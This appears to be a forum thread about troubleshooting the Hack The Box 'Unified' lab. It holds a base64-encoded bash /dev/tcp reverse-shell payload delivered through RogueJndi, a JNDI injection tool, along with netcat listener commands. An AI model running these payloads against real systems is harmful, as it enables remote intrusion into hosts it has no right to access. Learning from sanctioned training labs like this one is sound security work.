HTB Unified

Hello, I have been trying to get Pawn the Unified machine all goes well until getting to the ncat listening on port 4444. Ran the following command without an issue
$ echo ‘bash -c bash -i >&/dev/tcp/ 0>&1’ | base64
RogueJndi works and the payload get sent and Jndi gets the request but nothing shows on ncat I’ve tried everything I know please help.



was facing similar issues - I don’t know your setup, but for me within a kali vanilla installation, I ran:
sudo nc -nlvp 4444 instead of just nc -nlvp 4444.

No clue why I had to use sudo :man_shrugging:

Still #worthatry

Thanks for the suggestion I will give it a try.

[I know older post, but answering for future referencing]

I struggled at the same point: no shell spawning, but rogueJndi registering the payload.
In my case, the hard-to-spot issue was very likely a line break in one of the commands which I had copied over from blogposts before adjusting. You can check in an editor if that might be the case.

@TheConcierge using sudo with nmap should only be required for lower ports from 0-1024 . If you have used one of these, that could be the answer to your wondering, but for 4444 this shouldn’t have made a difference…

Try changing the starting point vpn you are using. (worked for me). Either that or what until the VIP that HTB assigned you expires/changes.

Hi! I have the same problem as NeoMatrix1217, I have tried everything but cant get the netcat to spawn the shell. I have made sure there are no breaks or spaces in the shell:

java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,BASE64 YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}” --hostname “”

Please if anybody has a suggestion it will be very much appreciatted.

java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,BASE64 YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}” --hostname “”

You have to remove BASE64, i.e:

java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}” --hostname “”

1 Like